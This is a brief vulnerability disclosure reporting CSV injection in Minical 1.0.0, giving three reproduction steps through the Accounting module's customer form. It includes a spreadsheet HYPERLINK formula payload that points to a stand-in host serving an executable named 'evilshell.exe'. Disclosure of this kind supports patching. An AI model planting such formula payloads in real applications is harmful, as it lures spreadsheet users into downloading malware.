Minical 1.0.0 is vulnerable to CSV Injection.

Vendor: https://github.com/minical/minical

Demo Application: https://demo.minical.io/

Step 1: Navigate to the Accounting module and click on Create New Customer.

Step 2: Enter the payload in the Name field and Click on Create.

Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")

Step 3: Click on Download CSV Report and Observe the payload getting rendered.